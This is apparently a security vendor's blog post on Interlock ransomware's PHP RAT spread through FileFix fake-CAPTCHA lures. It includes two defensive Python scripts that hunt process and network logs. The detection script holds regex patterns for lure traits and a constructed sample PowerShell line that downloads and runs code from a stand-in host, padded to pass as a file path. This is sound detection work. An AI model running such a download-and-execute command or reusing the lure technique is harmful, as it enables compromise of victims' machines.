Interlock Ransomware Detection: Adversaries Deploy a Novel PHP-Based RAT Variant via FileFix

Interlock Ransomware New Variant Detection

Threat actors operating the Interlock ransomware, known for executing high-impact double-extortion attacks across various global industries, have re-emerged in the cyber threat landscape. They have recently deployed a new PHP-based version of the group's custom RAT in a large-scale campaign, leveraging a modified ClickFix variant known as FileFix to target organizations across multiple sectors.

Detect Interlock Ransomware Attacks

The 2025 Verizon Data Breach Investigations Report (DBIR) shows that ransomware continues to grow, playing a role in 44% of breaches—up from 32% the year before. With average ransom payments reaching $2 million in 2024, attackers are more motivated than ever. Cybersecurity Ventures warns that by 2031, a ransomware attack could happen every two seconds, making strong and proactive threat detection more important than ever.

Register for the SOC Prime Platform to detect potential threats, like Interlock ransomware, at the earliest possible stage. The Platform delivers timely threat intelligence and actionable detection content, backed by a complete product suite for AI-powered detection engineering, automated threat hunting, and advanced threat detection. Click the Explore Detections button below to access a curated stack of detection rules specifically designed to help identify and respond to Interlock ransomware activity.

Explore Detections

All the rules in the SOC Prime Platform are compatible with multiple SIEM, EDR, and Data Lake solutions and mapped to the MITRE ATT&CK® framework. Additionally, each rule is packed with detailed metadata, including threat intel references, attack timelines, triage recommendations, and more.

Optionally, cyber defenders can apply the broader “Ransomware” tag to access a wider range of detection rules covering ransomware attacks globally.

Additionally, security experts can streamline threat investigation using Uncoder AI, a private IDE & co-pilot for threat-informed detection engineering. Generate detection algorithms from raw threat reports, enable fast IOC sweeps, predict ATT&CK tags, optimize query code with AI tips, and translate it across multiple SIEM, EDR, and Data Lake languages. For instance, cyber defenders can use IOCs from The DFIR Report research to instantly convert them into performance-optimized queries ready to run in a chosen SIEM or EDR environment.

Use Uncoder AI to search for IOCs related to the new Interlock RAT variant, instantly convertible into custom hunting queries.

Interlock Ransomware Analysis

The Interlock ransomware group is a relatively new but rapidly evolving threat in the cybercrime landscape. First observed in September 2024, the Interlock ransomware variant has been linked to a series of high-impact, double-extortion attacks targeting organizations across multiple sectors. Victims have included entities in healthcare, technology, and the public sector in the United States, as well as manufacturing firms throughout Europe.

A recent joint analysis by The DFIR Report and Proofpoint reveals that the ransomware group has developed and deployed a new PHP-based variant of its custom Interlock remote access trojan, also known as NodeSnake. While the name reflects the RAT's original Node.js foundation, this updated version represents a tactical shift. Since May 2025, the PHP variant has been observed in a widespread campaign linked to the LandUpdate808 threat cluster, also known as KongTuke. Threat actors have used a modified version of the ClickFix social-engineering technique, dubbed FileFix, to deliver the RAT and execute malicious payloads across a broad range of targeted industries.

FileFix represents an evolution of ClickFix, exploiting a social engineering trick that abuses the Windows File Explorer’s address bar. By luring victims into copying and pasting malicious commands, attackers can achieve code execution without needing traditional file downloads, adding stealth and simplicity to their delivery method.

The campaign begins with compromised websites injected with a single-line JavaScript snippet hidden in the HTML, often without the knowledge of site owners or visitors. This JavaScript code functions as a traffic distribution system (TDS), using IP filtering to redirect users to fake CAPTCHA verification pages. There, victims are tricked into running a PowerShell script, leading to the deployment of the Interlock RAT. Both Node.js and PHP variants have been observed in the wild.
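The chain above gives defenders one reliable chokepoint regardless of what the lure page says: a command pasted into the File Explorer address bar (or the Run dialog in classic ClickFix) is launched by explorer.exe, so the interpreter shows up as a direct child of explorer.exe with the pasted text as its command line. The script below is an added example, not code from the original post, The DFIR Report or SOC Prime. It scores constructed Sysmon-style process-creation events on that parent/child pair plus common lure traits; the trait list, and in particular the space-padded fake-path heuristic, are assumptions to tune against your own telemetry rather than indicators taken from the research.

```python
"""Score process-creation events for FileFix / ClickFix paste-and-run delivery.

Added example: the events below are constructed, not real incident telemetry.
"""
import re
from dataclasses import dataclass

# Interpreters a pasted lure command typically lands in.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Command-line traits common to paste-and-run lures. Illustrative, not exhaustive;
# tune against your own telemetry.
TRAITS = {
    "hidden window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "encoded command": re.compile(r"-e[a-z]*\s+[A-Za-z0-9+/=]{20,}", re.I),
    "execution policy bypass": re.compile(r"-(ep|executionpolicy)\s+bypass", re.I),
    "web download cmdlet": re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|curl)\b", re.I),
    "invoke-expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "url in command line": re.compile(r"https?://", re.I),
    # Assumed lure trait (not from the page): the pasted text is padded with spaces
    # and ends in a '#' comment holding a fake path so the address bar shows a path.
    "padded fake path comment": re.compile(r"\s{4,}#\s*[A-Za-z]:\\"),
}


@dataclass
class ProcEvent:
    """Subset of Sysmon Event ID 1 / EDR process-creation fields."""
    host: str
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: ProcEvent) -> tuple[int, list[str]]:
    """Return (score, reasons). A shell spawned directly by explorer.exe is the
    core signal (what a paste into the address bar or Run dialog produces);
    each matching command-line trait adds one point."""
    if _basename(ev.parent_image) != "explorer.exe" or _basename(ev.image) not in SHELLS:
        return 0, []
    reasons = ["shell spawned directly by explorer.exe"]
    reasons += [name for name, rx in TRAITS.items() if rx.search(ev.command_line)]
    return len(reasons), reasons


def triage(events, threshold: int = 2):
    """Events scoring at or above the threshold as (host, score, reasons), highest first."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev.host, score, reasons))
    return sorted(hits, key=lambda h: h[1], reverse=True)


# Constructed sample telemetry: one FileFix-style paste, one benign explorer child,
# one shell with a non-explorer parent, and one harmless explorer-launched cmd.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent("WS-017", r"C:\Windows\explorer.exe", PS,
              'powershell.exe -w hidden -ep bypass -c "iex (irm https://lure.example/x)"'
              + " " * 40 + r"# C:\company\HR\Policy.pdf"),
    ProcEvent("WS-017", r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
              "notepad.exe notes.txt"),
    ProcEvent("WS-022", r"C:\Windows\System32\cmd.exe", PS,
              'powershell -c "irm https://lure.example/y"'),
    ProcEvent("WS-031", r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c dir"),
]

if __name__ == "__main__":
    for host, score, reasons in triage(SAMPLE_EVENTS):
        print(f"{host}: score {score}")
        for r in reasons:
            print("  -", r)
```

An explorer.exe parent with a shell child is noisy on its own, since users do launch PowerShell that way, which is why the base signal only crosses the threshold together with a download, decode or hidden-window trait. In production this logic belongs in a SIEM query over Sysmon Event ID 1 or EDR process telemetry rather than a script, and a hit should be triaged alongside the browser's recent navigation to a CAPTCHA-style page.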

Once deployed, the Interlock RAT begins by performing reconnaissance on the infected system, gathering host information and exfiltrating it in JSON format. The malware also checks its privilege level—determining whether it is running under USER, ADMIN, or SYSTEM rights—and connects to a remote server to fetch and execute additional payloads, typically in EXE or DLL form.

To maintain persistence, the RAT modifies Windows Registry settings. For lateral movement across the network, it leverages Remote Desktop Protocol (RDP) access.

A distinctive feature of NodeSnake is its use of Cloudflare Tunnel subdomains to conceal the true location of its command-and-control (C2) infrastructure. Even if the tunnel is disabled or taken down, the malware is designed to maintain contact through hard-coded fallback IP addresses embedded in the code.
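Because the RAT's C2 hides behind Cloudflare Tunnel hostnames and falls back to hard-coded IP addresses, network telemetry offers two complementary hunts: lookups or TLS sessions for quick-tunnel names under trycloudflare.com, and direct-to-IP connections to a watchlist once the tunnel is gone. The script below is an added example, not code from the original post, The DFIR Report or SOC Prime. It runs over a constructed DNS/connection log format, and the fallback addresses are RFC 5737 TEST-NET placeholders standing in for the IOCs in the referenced research, not real indicators.

```python
"""Hunt DNS and connection logs for Cloudflare quick-tunnel C2 and fallback-IP beacons.

Added example over a constructed log format; the watchlist addresses are TEST-NET
placeholders, not real indicators.
"""
import re
from collections import defaultdict

# Cloudflare quick tunnels (cloudflared tunnel --url ...) get a random hostname
# under this suffix. Named tunnels use the operator's own domain and need other hunts.
TUNNEL_SUFFIX = ".trycloudflare.com"

# Fallback C2 addresses to watch once the tunnel is gone. Placeholders from
# RFC 5737 TEST-NET-3; replace with the IOCs from the referenced research.
FALLBACK_IPS = {"203.0.113.10", "203.0.113.11"}

# Constructed line format:
#   <ts> <host> dns <query>
#   <ts> <host> conn <dst_ip>:<dst_port> sni=<server_name or ->
LINE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<kind>dns|conn) (?P<rest>.+)$")


def parse(line: str):
    """Parse one log line into a dict, or None if it does not match the format."""
    m = LINE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    if ev["kind"] == "dns":
        ev["query"] = ev.pop("rest").lower().rstrip(".")
    else:
        dst, _, sni = ev.pop("rest").partition(" sni=")
        ev["dst_ip"], _, ev["dst_port"] = dst.rpartition(":")
        ev["sni"] = None if sni in ("", "-") else sni.lower()
    return ev


def hunt(lines):
    """Return {host: [finding, ...]} for hosts touching quick tunnels or fallback IPs."""
    findings = defaultdict(list)
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        if ev["kind"] == "dns":
            if ev["query"].endswith(TUNNEL_SUFFIX):
                findings[ev["host"]].append(f"{ev['ts']} dns lookup of quick tunnel {ev['query']}")
        elif ev["sni"] and ev["sni"].endswith(TUNNEL_SUFFIX):
            findings[ev["host"]].append(f"{ev['ts']} tls to quick tunnel {ev['sni']}")
        elif ev["dst_ip"] in FALLBACK_IPS:
            # No hostname involved: the beacon went straight to an embedded address,
            # the behaviour expected after the tunnel is disabled or taken down.
            findings[ev["host"]].append(
                f"{ev['ts']} direct connection to fallback C2 {ev['dst_ip']}:{ev['dst_port']}")
    return dict(findings)


# Constructed sample log: one host beaconing via a quick tunnel and then to a
# fallback address, one host doing ordinary browsing.
SAMPLE_LOG = """
2025-07-01T10:02:11Z WS-017 dns quiet-river-stone-lamp.trycloudflare.com
2025-07-01T10:02:12Z WS-017 conn 198.51.100.5:443 sni=quiet-river-stone-lamp.trycloudflare.com
2025-07-01T10:09:40Z WS-017 conn 203.0.113.10:443 sni=-
2025-07-01T10:10:02Z WS-022 dns www.example.com
2025-07-01T10:10:03Z WS-022 conn 198.51.100.20:443 sni=www.example.com
""".strip().splitlines()

if __name__ == "__main__":
    for host, items in hunt(SAMPLE_LOG).items():
        print(host)
        for item in items:
            print("  -", item)
```

Traffic to trycloudflare.com is not malicious by itself; developers use quick tunnels legitimately, so baseline first and treat a tunnel lookup followed shortly by a direct-to-IP session with no SNI on the same host as the stronger pattern. If the operators move to a named tunnel, the hostname will sit on an arbitrary domain and the suffix match will miss it; the fallback-IP hunt and the process-level signals still apply.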

The latest version of the Interlock RAT stands out from the earlier Node.js variant by using PHP, a commonly used web scripting language, to gain and maintain access to victim environments. This shift reflects the continual evolution of the group's tooling and growing operational complexity, demanding swift and adaptive responses from defenders. By relying on SOC Prime's top expertise and AI at the core of its complete product suite that fuses advanced detection engineering, automated capabilities, and AI-native threat intelligence, organizations in diverse industry sectors can future-proof their defenses at scale.

The post Interlock Ransomware Detection: Adversaries Deploy a Novel PHP-Based RAT Variant via FileFix appeared first on SOC Prime.